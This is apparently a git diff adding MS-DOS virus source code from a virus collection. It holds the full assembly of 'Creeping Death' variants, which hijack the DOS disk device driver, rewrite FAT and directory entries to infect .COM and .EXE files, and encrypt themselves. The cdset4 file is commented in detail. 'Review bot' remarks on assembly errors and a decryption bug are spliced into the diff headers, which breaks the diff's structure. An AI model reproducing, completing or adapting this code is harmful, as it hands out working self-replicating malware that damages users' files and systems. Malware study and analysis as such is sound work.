+ ret
+enc_val dw 0
+
+entry_point:
+ mov sp,102h ;Alternative coding
+ call get_bp ;to get the delta offset
+ ;Raver(tm)
+get_bp:
+ mov bp,word ptr ds:[100h]
+ mov sp,0fffeh
+ sub bp,offset get_bp
+
+ mov si, offset ditch ;This routine will make
+ add si,bp ;single-stepping programs
+; db 0ebh,0 ;stop.
+ mov byte ptr ds:[si],0c3h
+ ditch:
+ mov byte ptr ds:[si],0c6h
+
+ call decrypt ;decrypt virus
+ jmp install ;jmp to install code
+
+orgjmp db 0cdh,20h,00,00 ;buffer to save the 4 first bytes in,
+ ;remains unecrypted due to disinfection.
+end_of_virus:
+vend:
+
+ end start_of_virus
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.cdset.asm b/MSDOS/Virus.MSDOS.Unknown.cdset.asm
new file mode 100644
index 00000000..7296587a
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cdset.asm
@@ -0,0 +1,487 @@
+; Creeping Death V 1.0
+;
+; (C) Copyright 1991 by VirusSoft Corp.
+
+i13org = 5f8h
+i21org = 5fch
+
+ org 100h
+
+ mov sp,600h
+ inc counter
+ xor cx,cx
+ mov ds,cx
+ lds ax,[0c1h]
+ add ax,21h
+ push ds
+ push ax
+ mov ah,30h
+ call jump
+ cmp al,4
+ sbb si,si
+ mov drive+2,byte ptr -1
+ mov bx,60h
+ mov ah,4ah
+ call jump
+
+ mov ah,52h
+ call jump
+ push es:[bx-2]
+ lds bx,es:[bx]
+
+search: mov ax,[bx+si+15h]
+ cmp ax,70h
+ jne next
+ xchg ax,cx
+ mov [bx+si+18h],byte ptr -1
+ mov di,[bx+si+13h]
+ mov [bx+si+13h],offset header
+ mov [bx+si+15h],cs
+next: lds bx,[bx+si+19h]
+ cmp bx,-1
+ jne search
+ jcxz install
+
+ pop ds
+ mov ax,ds
+ add ax,[3]
+ inc ax
+ mov dx,cs
+ dec dx
+ cmp ax,dx
+ jne no_boot
+ add [3],61h
+no_boot: mov ds,dx
+ mov [1],8
+
+ mov ds,cx
+ les ax,[di+6]
+ mov cs:str_block,ax
+ mov cs:int_block,es
+
+ cld
+ mov si,1
+scan: dec si
+ lodsw
+ cmp ax,1effh
+ jne scan
+ mov ax,2cah
+ cmp [si+4],ax
+ je right
+ cmp [si+5],ax
+ jne scan
+right: lodsw
+ push cs
+ pop es
+ mov di,offset modify+1
+ stosw
+ xchg ax,si
+ mov di,offset i13org
+ cli
+ movsw
+ movsw
+
+ mov dx,0c000h
+fdsk1: mov ds,dx
+ xor si,si
+ lodsw
+ cmp ax,0aa55h
+ jne fdsk4
+ cbw
+ lodsb
+ mov cl,9
+ sal ax,cl
+fdsk2: cmp [si],6c7h
+ jne fdsk3
+ cmp [si+2],4ch
+ jne fdsk3
+ push dx
+ push [si+4]
+ jmp short death
+install: int 20h
+file: db "c:",255,0
+fdsk3: inc si
+ cmp si,ax
+ jb fdsk2
+fdsk4: inc dx
+ cmp dh,0f0h
+ jb fdsk1
+
+ sub sp,4
+death: push cs
+ pop ds
+ mov bx,[2ch]
+ mov es,bx
+ mov ah,49h
+ call jump
+ xor ax,ax
+ test bx,bx
+ jz boot
+ mov di,1
+seek: dec di
+ scasw
+ jne seek
+ lea si,[di+2]
+ jmp short exec
+boot: mov es,[16h]
+ mov bx,es:[16h]
+ dec bx
+ xor si,si
+exec: push bx
+ mov bx,offset param
+ mov [bx+4],cs
+ mov [bx+8],cs
+ mov [bx+12],cs
+ pop ds
+ push cs
+ pop es
+
+ mov di,offset f_name
+ push di
+ mov cx,40
+ rep movsw
+ push cs
+ pop ds
+
+ mov ah,3dh
+ mov dx,offset file
+ call jump
+ pop dx
+
+ mov ax,4b00h
+ call jump
+
mov ah,4dh
+ call jump
+ mov ah,4ch
+
+jump: pushf
+ call dword ptr cs:[i21org]
+ ret
+
+
+;--------Installation complete
+
+i13pr: mov ah,3
+ jmp dword ptr cs:[i13org]
+
+
+main: push ax ; driver
+ push cx ; strategy block
+ push dx
+ push ds
+ push si
+ push di
+
+ push es
+ pop ds
+ mov al,[bx+2]
+
+ cmp al,4 ; Input
+ je input
+ cmp al,8
+ je output
+ cmp al,9
+ je output
+
+ call in
+ cmp al,2 ; Build BPB
+ jne ppp ;
+ lds si,[bx+12h]
+ mov di,offset bpb_buf
+ mov es:[bx+12h],di
+ mov es:[bx+14h],cs
+ push es
+ push cs
+ pop es
+ mov cx,16
+ rep movsw
+ pop es
+ push cs
+ pop ds
+ mov al,[di+2-32]
+ cmp al,2
+ adc al,0
+ cbw
+ cmp [di+8-32],0
+ je m32
+ sub [di+8-32],ax
+ jmp short ppp
+m32: sub [di+15h-32],ax
+ sbb [di+17h-32],0
+
+ppp: pop di
+ pop si
+ pop ds
+ pop dx
+ pop cx
+ pop ax
+rts: retf
+
+output: mov cx,0ff09h
+ call check
+ jz inf_sec
+ call in
+ jmp short inf_dsk
+
+inf_sec: jmp _inf_sec
+read: jmp _read
+read_: add sp,16
+ jmp short ppp
+
+input: call check
+ jz read
+inf_dsk: mov byte ptr [bx+2],4
+ cld
+ lea si,[bx+0eh]
+ mov cx,8
+save: lodsw
+ push ax
+ loop save
+ mov [bx+14h],1
+ call driver
+ jnz read_
+ mov byte ptr [bx+2],2
+ call in
+ lds si,[bx+12h]
+ mov ax,[si+6]
+ add ax,15
+ mov cl,4
+ shr ax,cl
+ mov di,[si+0bh]
+ add di,di
+ stc
+ adc di,ax
+ push di
+ cwd
+ mov ax,[si+8]
+ test ax,ax
+ jnz more
+ mov ax,[si+15h]
+ mov dx,[si+17h]
+more: xor cx,cx
+ sub ax,di
+ sbb dx,cx
+ mov cl,[si+2]
+ div cx
+ cmp cl,2
+ sbb ax,-1
+ push ax
+ call convert
+ mov byte ptr es:[bx+2],4
+ mov es:[bx+14h],ax
+ call driver
+again: lds si,es:[bx+0eh]
+ add si,dx
+ sub dh,cl
+ adc dx,ax
+ mov cs:gad+1,dx
+ cmp cl,1
+ je small
+ mov ax,[si]
+ and ax,di
+ cmp ax,0fff7h
+ je bad
+ cmp ax,0ff7h
+ je bad
+ cmp ax,0ff70h
+ jne ok
+bad: pop ax
+ dec ax
+ push ax
+ call convert
+ jmp short again
+small: not di
+ and [si],di
+ pop ax
+ push ax
+ inc ax
+ push ax
+ mov dx,0fh
+ test di,dx
+ jz here
+ inc dx
+ mul dx
+here: or [si],ax
+ pop ax
+ call convert
+ mov si,es:[bx+0eh]
+ add si,dx
+ mov ax,[si]
+ and ax,di
+ok: mov dx,di
+ dec dx
+ and dx,di
+ not di
+ and [si],di
+ or [si],dx
+
+ cmp ax,dx
+ pop ax
+ pop di
+ mov cs:pointer+1,ax
+ je _read_
+ mov dx,[si]
+ push ds
+ push si
+ call write
+ pop si
+ pop ds
+ jnz _read_
+ call driver
+ cmp [si],dx
+ jne _read_
+ dec ax
+ dec ax
+ mul cx
+ add ax,di
+ adc dx,0
+ push es
+ pop ds
+ mov [bx+12h],2
+ mov [bx+14h],ax
+ test dx,dx
+ jz less
+ mov [bx+14h],-1
+ mov [bx+1ah],ax
+ mov [bx+1ch],dx
+less: mov [bx+10h],cs
+ mov [bx+0eh],100h
+ call write
+
+_read_: std
+ lea di,[bx+1ch]
+ mov cx,8
+load: pop ax
+ stosw
+ loop load
+_read: call in
+
+ mov cx,9
+_inf_sec:
+ mov di,es:[bx+12h]
+ lds si,es:[bx+0eh]
+ sal di,cl
+ xor cl,cl
+ add di,si
+ xor dl,dl
+ push ds
+ push si
+ call find
+ jcxz no_inf
+ call write
+ and es:[bx+4],byte ptr 07fh
+no_inf: pop si
+ pop ds
+ inc dx
+ call find
+ jmp ppp
+
+;--------Subroutines
+
+find: mov ax,[si+8]
+ cmp ax,"XE"
+ jne com
+ cmp [si+10],al
+ je found
+com: cmp ax,"OC"
+ jne go_on
+ cmp byte ptr [si+10],"M"
+ jne go_on
+found: test [si+1eh],0ffc0h ; >4MB
+ jnz go_on
+ test [si+1dh],03ff8h ; <2048B
+ jz go_on
+ test [si+0bh],byte ptr 1ch
+ jnz go_on
+ test dl,dl
+ jnz rest
+pointer: mov ax,1234h
+ cmp ax,[si+1ah]
+ je go_on
+ xchg ax,[si+1ah]
+gad: xor ax,1234h
+ mov [si+14h],ax
+ loop go_on
+rest: xor ax,ax
+ xchg ax,[si+14h]
+ xor ax,cs:gad+1
+ mov [si+1ah],ax
+go_on: ;rol cs:gad+1,1
+ db 2eh,0d1h,6
+ dw offset gad+1
+ add si,32
+ cmp di,si
+ jne find
+ ret
+
+check: mov ah,[bx+1]
+drive: cmp ah,-1
+ mov cs:[drive+2],ah
+ jne changed
+ push [bx+0eh]
+ mov byte ptr [bx+2],1
+ call in
+ cmp byte ptr [bx+0eh],1
+ pop [bx+0eh]
+ mov [bx+2],al
+changed: ret
+
+write: cmp byte ptr es:[bx+2],8
+ jae in
+ mov byte ptr es:[bx+2],4
+ mov si,70h
+ mov ds,si
+modify: mov si,1234h
+ push [si]
+ push [si+2]
+ mov [si],offset i13pr
+ mov [si+2],cs
+ call in
+ pop [si+2]
+ pop [si]
+ ret
+
+driver: mov es:[bx+12h],1
+in:
+ db 09ah
+str_block:
+ dw ?,70h
+ db 09ah
+int_block:
+ dw ?,70h
+ test es:[bx+4],byte ptr 80h
+ ret
+
+convert: cmp ax,0ff0h
+ jae fat_16
+ mov si,3
+ xor cs:[si+gad-1],si
+ mul si
+ shr ax,1
+ mov di,0fffh
+ jnc cont
+ mov di,0fff0h
+ jmp short cont
+fat_16: mov si,2
+ mul si
+ mov di,0ffffh
+cont: mov si,512
+ div si
+header: inc ax
+ ret
+
+counter: dw 0
+
+ dw 842h
+ dw offset main
+ dw offset rts
+ db 7fh
+
+param: dw 0,80h,?,5ch,?,6ch,?
+
+bpb_buf: db 32 dup(?)
+f_name: db 80 dup(?)
+
+;--------The End.
+
+MsDos
\ No newline at end of file
diff --git a/MSDOS/Virus.MSDOS.Unknown.cdset4.asm b/MSDOS/Virus.MSDOS.Unknown.cdset4.asm
new file mode 100644
index 00000000..2a2c55aa
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cdset4.asm
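Review bot: The listing as committed cannot assemble: after `;--------The End.` the file ends with a bare `MsDos` token on a line of its own and no `end` directive, so an assembler sees an undefined symbol where it expects END. The code also carries no commentary at all, while `cdset4.asm` in the same commit is an annotated variant of the same driver-level design, so a one-line pointer to it at the top would help readers. In particular the equates `i13org = 5f8h` and `i21org = 5fch` are never stored to by name and appear to be filled through the stack — `mov sp,600h` followed by `push ds / push ax` lands the int 21h entry at 5FCh, and `push dx / push [si+4]` (or `sub sp,4` when no ROM entry is found) leaves the int 13h entry at 5F8h — which deserves a comment such as `; i13org/i21org sit at the top of the 600h block and are filled by the pushes made just below sp=600h`.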
@@ -0,0 +1,655 @@
+;****************************************************************************;
+; ;
+; -=][][][][][][][][][][][][][][][=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] [=- ;
+; -=] For All Your H/P/A/V Files [=- ;
+; -=] SysOp: Peter Venkman [=- ;
+; -=] [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=][][][][][][][][][][][][][][][=- ;
+; ;
+; *** NOT FOR GENERAL DISTRIBUTION *** ;
+; ;
+; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
+; Around Among the General Public. It Will be Very Useful for Learning how ;
+; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
+; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
+; Experience can Turn it Into a far More Malevolent Program Than it Already ;
+; Is. Keep This Code in Responsible Hands! ;
+; ;
+;****************************************************************************;
+;*****************************************************************************;
+; ;
+; Creeping Death IV (Encrypting, try to find it) ;
+; ;
+; (c) Copyright 1992 by Bit Addict ;
+; ;
+;*****************************************************************************;
+
+code segment public 'code'
+ assume cs:code, ds:code, es:code
+ org 100h
+
+;*****************************************************************************;
+; ;
+; Actual start of virus. In this part the virus initializes the stack and ;
+; adjusts the device driver used by dos to read and write from floppy's and ;
+; hard disks.
Then it will start the orginal exe or com-file ;
+; ;
+;*****************************************************************************;
+
+Encrypt: mov bx,offset Main-9
+Repeat: xor byte ptr [bx+8],bl
+ inc bx
+ jnz Repeat
+
+Main: mov sp,600h ; init stack
+ inc Counter
+
+;*****************************************************************************;
+; ;
+; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ;
+; si will be -1 ;
+; ;
+;*****************************************************************************;
+
+DosVersion: mov ah,30h ; fn 30h = Get Dosversion
+ int 21h ; int 21h
+ cmp al,4 ; major dosversion
+ sbb di,di
+ mov byte ptr ds:drive[2],-1 ; set 2nd operand of cmp ah,??
+
+;*****************************************************************************;
+; ;
+; Adjust the size of the codesegment, with dos function 4ah ;
+; ;
+;*****************************************************************************;
+
+ mov bx,60h ; Adjust size of memory block
+ mov ah,4ah ; to 60 paragraphs = 600h bytes
+ int 21h ; int 21h
+
+ mov ah,52h ; get internal list of lists
+ int 21h ; int 21h
+
+;*****************************************************************************;
+; ;
+; If the virus code segment is located behind the dos config memory block the ;
+; code segment will be part of the config memory block making it 61h ;
+; paragraphs larger. If the virus is not located next to the config memory ;
+; block the virus will set the owner to 8h (Dos system) ;
+; ;
+;*****************************************************************************;
+
+ mov ax,es:[bx-2] ; segment of first MCB
+ mov dx,cs ; dx = MCB of the code segment
+ dec dx
+NextMCB: mov ds,ax ; ax = segment next MCB
+ add ax,ds:[3]
+ inc ax
+ cmp ax,dx ; are they equal ?
+ jne NextMCB ; no, not 1st program executed
+ cmp word ptr ds:[1],8
+ jne NoBoot
+ add word ptr ds:[3],61h ; add 61h to size of block
+NoBoot: mov ds,dx ; ds = segment of MCB
+ mov word ptr ds:[1],8 ; owner = dos system
+
+;*****************************************************************************;
+; ;
+; The virus will search for the disk paramenter block for drive a: - c: in ;
+; order to find the device driver for these block devices. If any of these ;
+; blocks is found the virus will install its own device driver and set the ;
+; access flag to -1 to tell dos this device hasn't been accesed yet. ;
+; ;
+;*****************************************************************************;
+
+ cld ; clear direction flag
+ lds bx,es:[bx] ; get pointer to first drive
+ ; paramenter block
+
+Search: cmp bx,-1 ; last block ?
+ je Last
+ mov ax,ds:[bx+di+15h] ; get segment of device header
+ cmp ax,70h ; dos device header ??
+ jne Next ; no, go to next device
+ xchg ax,cx
+ mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive
+ ; has not been accessed"
+ mov si,offset Header-4 ; set address of new device
+ xchg si,ds:[bx+di+13h] ; and save old address
+ mov ds:[bx+di+15h],cs
+Next: lds bx,ds:[bx+di+19h] ; next drive parameter block
+ jmp Search
+
+;*****************************************************************************;
+; ;
+; If the virus has failed in starting the orginal exe-file it will jump here. ;
+; ;
+;*****************************************************************************;
+
+Install: int 20h
+
+;*****************************************************************************;
+; ;
+; An file is opend with this name, but the file will not be found.
;
+; ;
+;*****************************************************************************;
+
+File: db "C:",255,0
+
+;*****************************************************************************;
+; ;
+; If none of these devices is found it means the virus is already resident ;
+; and the virus wasn't able to start the orginal exe-file (the file is ;
+; corrupted by copying it without the virus memory resident). If the device ;
+; is found the information in the header is copied. ;
+; ;
+;*****************************************************************************;
+
+Last: jcxz install
+
+;*****************************************************************************;
+; ;
+; The information about the dos device driver is copyed to the virus code ;
+; segment ;
+; ;
+;*****************************************************************************;
+
+ mov ds,cx ; ds = segment of Device Driver
+ add si,4
+ push cs
+ pop es
+ mov di,offset Header
+ movsw
+ lodsw
+ mov es:StrBlock,ax
+ mov ax,offset Strategy
+ stosw
+ lodsw
+ mov es:IntBlock,ax
+ mov ax,offset Interrupt
+ stosw
+ movsb
+
+;*****************************************************************************;
+; ;
+; Deallocate the environment memory block and start the this file again, but ;
+; if the virus succeeds it will start the orginal exe-file. ;
+; ;
+;*****************************************************************************;
+
+ push cs
+ pop ds
+ mov bx,ds:[2ch] ; environment segment
+ or bx,bx ; =0 ?
+ jz Boot
+ mov es,bx
+ mov ah,49h ; deallocate memory
+ int 21h
+ xor ax,ax
+ mov di,1
+Seek: dec di ; scan for end of environment
+ scasw
+ jne Seek
+ lea si,ds:[di+2] ; es:si = start of filename
+ jmp short Exec
+
+Boot: mov ds,ds:[16h] ; es = parent PSP
+ mov bx,ds:[16h] ; bx = parent PSP of Parent PSP
+ xor si,si
+ sub bx,1
+ jnb Exec
+ mov ax,cs
+ dec ax
+ mov ds,ax
+ mov cx,8
+ mov si,8
+ mov di,0ffh
+Count: lodsb
+ or al,al
+ loopne Count
+ not cx
+ and cx,7
+NextByte: mov si,8
+ inc di
+ push di
+ push cx
+ rep cmpsb
+ pop cx
+ pop di
+ jne NextByte
+BeginName: dec di
+ cmp byte ptr es:[di-1],0
+ jne BeginName
+ mov si,di
+ mov bx,es
+Exec: push bx
+ push cs
+ pop ds
+ mov bx,offset Param
+ mov ds:[bx+4],cs ; set segments in EPB
+ mov ds:[bx+8],cs
+ mov ds:[bx+12],cs
+ pop ds
+ push cs
+ pop es
+
+ mov di,offset f_name ; copy name of this file
+ push di
+ mov cx,40
+ rep movsw
+ push cs
+ pop ds
+
+ mov ah,3dh ; open file, this file will
+ mov dx,offset File ; not be found but the entire
+ int 21h ; directory is searched and
+ pop dx ; infected
+
+ mov ax,4b00h ; execute file
+ int 21h
+ mov ah,4dh ; get exit-code
+ int 21h
+ mov ah,4ch ; terminate (al = exit code)
+ int 21h
+
+;*****************************************************************************;
+; ;
+; Installation complete ;
+; ;
+;*****************************************************************************;
+; ;
+; The next part contains the device driver used by creeping death to infect ;
+; directory's ;
+; ;
+; The device driver uses only the strategy routine to handle the requests. ;
+; I don't know if this is because the virus will work better or the writer ;
+; of this virus didn't know how to do it right.
;
+; ;
+;*****************************************************************************;
+
+
+Strategy: mov cs:RequestOffset,bx
+ mov cs:RequestSegment,es
+ retf
+
+Interrupt: push ax ; driver strategy block
+ push bx
+ push cx ; save registers
+ push dx
+ push si
+ push di
+ push ds
+ push es
+
+ les bx,cs:Request
+ push es
+ pop ds
+ mov al,ds:[bx+2] ; Command Code
+
+ cmp al,4 ; Input
+ je Input
+ cmp al,8 ; Output
+ je Output
+ cmp al,9
+ je Output
+
+ call DoRequest
+
+ cmp al,2 ; Build BPB
+ jne Return
+ lds si,ds:[bx+12h] ; copy the BPB and change it
+ mov di,offset bpb_buf ; into one that hides the virus
+ mov es:[bx+12h],di
+ mov es:[bx+14h],cs
+ push es ; copy
+ push cs
+ pop es
+ mov cx,16
+ rep movsw
+ pop es
+ push cs
+ pop ds
+ mov al,ds:[di+2-32] ; change
+ cmp al,2
+ adc al,0
+ cbw
+ cmp word ptr ds:[di+8-32],0 ; >32mb partition ?
+ je m32 ; yes, jump to m32
+ sub ds:[di+8-32],ax ; <32mb partition
+ jmp short Return
+m32: sub ds:[di+15h-32],ax ; >32mb partition
+ sbb word ptr ds:[di+17h-32],0
+Return: pop es ; return to caller
+ pop ds
+ pop di
+ pop si
+ pop dx
+ pop cx
+ pop bx
+ pop ax
+ retf
+
+Output: mov cx,0ff09h ; check if disk changed
+ call check
+ jz InfectSector ; no, just infect sector
+ call DoRequest ; yes, write virus to disk
+ jmp short inf_dsk
+
+InfectSector: jmp _InfectSector ; infect sector
+Read: jmp _Read ; read sector
+ReadError: add sp,16 ; error during request
+ jmp short Return
+
+Input: call check ; check if disk changed
+ jz Read ; no, read sector
+inf_dsk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk
+ cld ; save last part of request
+ lea si,ds:[bx+0eh]
+ mov cx,8
+save: lodsw
+ push ax
+ loop save
+ mov word ptr ds:[bx+14h],1 ; read 1st sector on disk
+ call ReadSector
+ jnz ReadError
+ mov byte ptr ds:[bx+2],2 ; build BPB
+ call DoRequest
+ lds si,ds:[bx+12h] ; ds:si = BPB
+ mov di,ds:[si+6] ; size of root directory
+ add di,15 ; in sectors
+ mov cl,4
+ shr di,cl
+ mov al,ds:[si+5]
+ cbw
+ mov dx,ds:[si+0bh]
+
mul dx ; ax=fat sectors, dx=0
+ add ax,ds:[si+3]
+ add di,ax
+ push di ; save it on stack
+ mov ax,ds:[si+8] ; total number of sectors
+ cmp ax,dx ; >32mb
+ jnz more ; no, skip next 2 instructions
+ mov ax,ds:[si+15h] ; get number of sectors
+ mov dx,ds:[si+17h]
+more: xor cx,cx ; cx=0
+ sub ax,di ; dx:ax=number is data sectors
+ sbb dx,cx
+ mov cl,ds:[si+2] ; cx=sectors / cluster
+ div cx ; number of clusters on disk
+ cmp cl,2 ; 1 sector/cluster ?
+ sbb ax,-1 ; number of clusters (+1 or +2)
+ push ax ; save it on stack
+ call Convert ; get fat sector and offset in
+ mov byte ptr es:[bx+2],4 ; sector
+ mov es:[bx+14h],ax
+ call ReadSector ; read fat sector
+again: lds si,es:[bx+0eh]
+ add si,dx
+ sub dh,cl ; has something to do with the
+ adc dx,ax ; encryption of the pointers
+ mov word ptr cs:[gad+1],dx
+ cmp cl,1 ; 1 sector / cluster
+ jne Ok
+SmallModel: not di ; this is used when the
+ and ds:[si],di ; clusters are 1 sector long
+ pop ax
+ push ax
+ inc ax
+ push ax
+ mov dx,0fh
+ test di,dx
+ jz here
+ inc dx
+ mul dx
+here: or ds:[si],ax
+ pop ax
+ call Convert
+ mov si,es:[bx+0eh]
+ add si,dx
+Ok: mov ax,ds:[si]
+ and ax,di
+ mov dx,di ; allocate cluster
+ dec dx
+ and dx,di
+ not di
+ and ds:[si],di
+ or ds:[si],dx
+ cmp ax,dx ; cluster already allocated by
+ pop ax ; the virus ?
+ pop di
+ mov word ptr cs:[pointer+1],ax
+ je _Read_ ; yes, don't write it and go on
+ mov dx,ds:[si]
+ push ds
+ push si
+ mov byte ptr es:[bx+2],8 ; write
+ call DoRequest ; write the adjusted sector to
+ pop si ; disk
+ pop ds
+ jnz _Read_
+ call ReadSector ; read it again
+ cmp ds:[si],dx ; is it written correctly ?
+ jne _Read_ ; no, can't infect disk
+ dec ax
+ dec ax ; calculate the sector number
+ mul cx ; to write the virus to
+ add ax,di
+ adc dx,0
+ push es
+ pop ds
+ mov word ptr ds:[bx+12h],2
+ mov ds:[bx+14h],ax ; store it in the request hdr
+ test dx,dx
+ jz less
+ mov word ptr ds:[bx+14h],-1
+ mov ds:[bx+1ah],ax
+ mov ds:[bx+1ch],dx
+less: mov ds:[bx+10h],cs
+ mov ds:[bx+0eh],100h
+ mov byte ptr es:[bx+2],8 ; write it
+ call EncryptWrite1
+
+_Read_: mov byte ptr ds:[bx+2],4 ; restore this byte
+ std ; restore other part of the
+ lea di,ds:[bx+1ch] ; request
+ mov cx,8
+load: pop ax
+ stosw
+ loop load
+_Read: call DoRequest ; do request
+
+ mov cx,9
+_InfectSector: mov di,es:[bx+12h] ; get number of sectors read
+ lds si,es:[bx+0eh] ; get address of data
+ sal di,cl ; calculate end of buffer
+ xor cl,cl
+ add di,si
+ xor dl,dl
+ push ds ; infect the sector
+ push si
+ call find
+ jcxz no_inf ; write sector ?
+ mov al,8
+ xchg al,es:[bx+2] ; save command byte
+ call DoRequest ; write sector
+ mov es:[bx+2],al ; restore command byte
+ and byte ptr es:[bx+4],07fh
+no_inf: pop si
+ pop ds
+ inc dx ; disinfect sector in memory
+ call find
+ jmp Return ; return to caller
+
+;*****************************************************************************;
+; ;
+; Subroutines ;
+; ;
+;*****************************************************************************;
+
+find: mov ax,ds:[si+8] ; (dis)infect sector in memory
+ cmp ax,"XE" ; check for .exe
+ jne com
+ cmp ds:[si+10],al
+ je found
+com: cmp ax,"OC" ; check for .com
+ jne go_on
+ cmp byte ptr ds:[si+10],"M"
+ jne go_on
+found: test word ptr ds:[si+1eh],0ffc0h ; file to big
+ jnz go_on ; more than 4mb
+ test word ptr ds:[si+1dh],03ff8h ; file to small
+ jz go_on ; less than 2048 bytes
+ test byte ptr ds:[si+0bh],1ch ; directory, system or
+ jnz go_on ; volume label
+ test dl,dl ; infect or disinfect ?
+ jnz rest
+pointer: mov ax,1234h ; ax = viral cluster
+ cmp ax,ds:[si+1ah] ; file already infected ?
+ je go_on ; yes, go on
+ xchg ax,ds:[si+1ah] ; exchange pointers
+gad: xor ax,1234h ; encryption
+ mov ds:[si+14h],ax ; store it on another place
+ loop go_on ; change cx and go on
+rest: xor ax,ax ; ax = 0
+ xchg ax,ds:[si+14h] ; get pointer
+ xor ax,word ptr cs:[gad+1] ; Encrypt
+ mov ds:[si+1ah],ax ; store it on the right place
+go_on: rol word ptr cs:[gad+1],1 ; change encryption
+ add si,32 ; next directory entry
+ cmp di,si ; end of buffer ?
+ jne find ; no, do it again
+ ret ; return
+
+check: mov ah,ds:[bx+1] ; get number of unit
+drive: cmp ah,-1 ; same as last call ?
+ mov byte ptr cs:[drive+2],ah ; set 2nd parameter
+ jne changed
+ push ds:[bx+0eh] ; save word
+ mov byte ptr ds:[bx+2],1 ; disk changed ?
+ call DoRequest
+ cmp byte ptr ds:[bx+0eh],1 ; 1=Yes
+ pop ds:[bx+0eh] ; restore word
+ mov ds:[bx+2],al ; restore command
+changed: ret ; return
+
+ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk
+
+DoRequest: db 09ah ; call 70:?, orginal strategy
+StrBlock dw ?,70h
+ db 09ah ; call 70:?, orginal interrupt
+IntBlock dw ?,70h
+ test byte ptr es:[bx+4],80h ; error ?
yes, zf = 0
+ ret ; return
+
+Convert: cmp ax,0ff0h ; convert cluster number into
+ jae fat_16 ; an sector number and offset
+ mov si,3 ; into this sector containing
+ xor word ptr cs:[si+gad-1],si ; the fat-item of this
+ mul si ; cluster
+ shr ax,1
+ mov di,0fffh
+ jnc cont
+ mov di,0fff0h
+ jmp short cont
+fat_16: mov si,2
+ mul si
+ mov di,0ffffh
+cont: mov si,512
+ div si
+ inc ax
+ ret
+
+EncryptWrite1: push ds
+ push cs
+ pop ds
+ push es
+ push cs
+ pop es
+ cld
+ mov cx,9
+ mov si,offset Encrypt
+ mov di,offset EncryptWrite2
+ mov al,ds:[si+5]
+ add al,11
+ mov ds:[si+5],al
+ cbw
+ mov dx,offset Main-1
+ sub dx,ax
+ mov ds:[si+1],dx
+ rep movsb
+ mov cl,10
+ mov si,offset DoRequest
+ rep movsb
+ mov cl,9
+ mov si,offset Encrypt
+ rep movsb
+ mov ax,0c31fh
+ stosw
+ pop es
+ jmp EncryptWrite2
+
+Counter dw 0 ; this will count the number of
+ ; systems that are infected by
+ ; this virus
+
+Param: dw 0,80h,?,5ch,?,6ch,? ; parameters for the
+ ; exec-function
+
+Header db 7 dup(?) ; this is the header for the
+ ; device driver
+
+Request equ this dword ; address of the request header
+RequestOffset dw ?
+RequestSegment dw ?
+
+bpb_buf: db 32 dup(?) ; buffer for BPB
+EncryptWrite2: db 30 dup(?)
+f_name: db 80 dup(?)
; Buffer for the filename used
+ ; by the exec-function
+
+
+
+;*****************************************************************************;
+; ;
+; The End ;
+; ;
+;*****************************************************************************;
+
+code ends
+
+end Encrypt
+
+;****************************************************************************;
+; ;
+; -=][][][][][][][][][][][][][][][=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] [=- ;
+; -=] For All Your H/P/A/V Files [=- ;
+; -=] SysOp: Peter Venkman [=- ;
+; -=] [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=][][][][][][][][][][][][][][][=- ;
+; ;
+; *** NOT FOR GENERAL DISTRIBUTION *** ;
+; ;
+; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
+; Around Among the General Public. It Will be Very Useful for Learning how ;
+; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
+; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
+; Experience can Turn it Into a far More Malevolent Program Than it Already ;
+; Is. Keep This Code in Responsible Hands! ;
+; ;
+;****************************************************************************;
+
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪;
+;哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪哪;
+;哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪;
+;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪;
+
diff --git a/MSDOS/Virus.MSDOS.Unknown.cdset5.asm b/MSDOS/Virus.MSDOS.Unknown.cdset5.asm
new file mode 100644
index 00000000..57aa91b0
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cdset5.asm
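Review bot: The decryption loop at `Encrypt:` has no length: `mov bx,offset Main-9 / Repeat: xor byte ptr [bx+8],bl / inc bx / jnz Repeat` runs until BX wraps through zero, so it XORs from Main-1 to the end of the 64K segment (wrapping into the first bytes of the PSP), not just the 600h-byte block the virus keeps after `mov ah,4ah`. EncryptWrite1 copies these same 9 bytes into EncryptWrite2 and runs them from inside the device-driver request, once before and once after the write, so while the original driver executes everything above the resident block in that segment is transiently scrambled. `cdset5.asm` in this commit is headed "(Version 4 bug Fixed)" and bounds its loop with `mov cx,400h-11 / loop Repeat`, which is presumably this bug. For a study corpus I would annotate rather than repair it: `; NOTE: loop ends only when BX wraps - XORs Main-1..FFFFh, not just the 600h image (bounded in V5)`, and add that the patching in EncryptWrite1 (`[si+1]`, `[si+5]`, the 9-byte copy) assumes this exact encoding.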
@@ -0,0 +1,661 @@
+;****************************************************************************;
+; ;
+; -=][][][][][][][][][][][][][][][=- ;
+; -=] P E R F E C T C R I M E [=- ;
+; -=] +31.(o)79.426o79 [=- ;
+; -=] [=- ;
+; -=] For All Your H/P/A/V Files [=- ;
